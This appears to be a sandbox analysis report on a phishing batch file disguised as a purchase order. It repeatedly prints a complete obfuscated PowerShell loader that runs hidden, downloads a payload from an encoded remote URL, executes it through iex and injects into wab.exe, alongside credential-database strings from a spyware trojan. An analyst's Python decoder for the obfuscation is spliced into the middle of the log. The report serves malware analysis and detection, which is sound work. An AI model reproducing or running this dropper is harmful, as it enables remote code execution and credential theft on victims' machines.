,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:O
              Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
              Source: wab.exe, 0000000A.00000002.4222367203.0000000007252000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. 
vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;
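The stub repeated in these memory strings decodes each literal by taking every third character starting at index 2: `$Apocrisiary++` on an unset variable yields 1, so `Substring($i, 1)` returns one character per step, and `Sloshily` hands the result to `& $Paprr`, where `$Paprr` itself decodes to `iex`. The Python decoder below is an added analyst example, not code from the report or from the sample. It mirrors that rule, decodes the three short literals that survive this page intact (`$Paprr`, `$Hennes`, `$Jejune203`), and walks a constructed script fragment produced by a matching encoder; the plaintexts, the fixed seed and the `Indbandtes '...'` regex are assumptions made here. Run it against the raw command line from the process tree or from PowerShell script block logging rather than against the text as rendered above: repeated spaces inside the longer literals have been collapsed in this rendering, which shifts the three-character frame.

```python
"""Decoder for the third-character string obfuscation in the PowerShell stage
captured above (the Indbandtes / Sloshily stub).

Added analyst example, not code from the report or from the sample. It mirrors
the decoding rule the stub exposes and adds an encoder that exists only to
build constructed test inputs."""
import random
import re
import string

# Observed in the stub: $Apocrisiary++ on an unset variable yields 1, so each
# Substring call returns one character; the loop starts at index 2, steps by 3
# and runs while $i -lt ($Forsimple.Length - $Apocrisiary).
START, STEP, WIDTH = 2, 3, 1


def decode(blob: str, width: int = WIDTH, start: int = START, step: int = STEP) -> str:
    """Python mirror of Indbandtes. width=0 reproduces the path where the
    If (${host}.CurrentUICulture) guard is not taken: $Apocrisiary stays
    $null, Substring($i, $null) returns "", and every literal decodes to "".
    """
    limit = len(blob) - width
    return "".join(blob[i:i + width] for i in range(start, limit, step))


def encode(text: str, rng: random.Random, step: int = STEP) -> str:
    """Inverse of decode, used only to construct test inputs: step-1 junk
    characters before each real character, one junk character at the end so
    the last real character lies below Length - 1 (the stub's literals end in
    a padding space for the same reason)."""
    junk = string.ascii_letters + ".,: "
    parts = ["".join(rng.choice(junk) for _ in range(step - 1)) + ch for ch in text]
    parts.append(rng.choice(junk))
    return "".join(parts)


# Matches the call form used throughout the stub: Indbandtes '<literal>'.
# Assumption: the literals contain no single quote (true of every one above).
LITERAL = re.compile(r"Indbandtes\s+'([^']*)'")


def decode_script(script: str) -> list[str]:
    """Decode every Indbandtes literal in a script body, in source order."""
    return [decode(m.group(1)) for m in LITERAL.finditer(script)]


# Three short literals copied verbatim from the memory strings above. Longer
# ones cannot be decoded from this page as rendered: runs of spaces inside
# them were collapsed by the HTML, which shifts the 3-character frame.
PAGE_LITERALS = {
    "Paprr": "B,iP,e hx H ",
    "Hennes": " ,UDisEpeA.rG -GgA eg ,ey.nBytB. ",
    "Jejune203": "Va>In ",
}


def decode_page_literals() -> dict[str, str]:
    """Decode the page literals above: iex, User-Agent and the '>' separator."""
    return {name: decode(blob) for name, blob in PAGE_LITERALS.items()}


def demo() -> list[str]:
    """Constructed stand-in for a stub: two plaintexts encoded with a fixed
    seed, wrapped the way the sample wraps them, then decoded in order."""
    rng = random.Random(1)
    plaintexts = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",           # constructed
        "$global:Client = New-Object System.Net.WebClient",    # constructed
    ]
    script = ";".join(
        f"Sloshily (Indbandtes '{encode(p, rng)}')" for p in plaintexts
    )
    return decode_script(script)


if __name__ == "__main__":
    for name, value in decode_page_literals().items():
        print(f"${name} = {value!r}")
    for line in demo():
        print(line)
```

The first 33 characters of the `$Velproevet` literal above (`HeMB.o dzM,i.elFil Sa u/Sc5 P. G0`) decode to `Mozilla/5.0` with one padding character appended, which confirms the frame; the `width=0` path shows why an analysis host whose `$host.CurrentUICulture` is unset sees every literal decode to an empty string and the stage silently does nothing.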
              Source: powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Process7860Win32_Processpowershell.exepowershell.exepowershell.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro|C:\Windows|\Device\Harddisk0\Partition320240828120116.301492+000C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Slosh
              Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winBAT@50/20@15/11
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,17_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,19_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,17_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,17_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,17_2_0040B58D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Negligent.Gas
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\shietgtst-TYE3VH
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1
              Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System information queried: HandleInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7616
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7860
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5288
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8084
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000011.00000002.2267503862.0000000003640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
              Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman 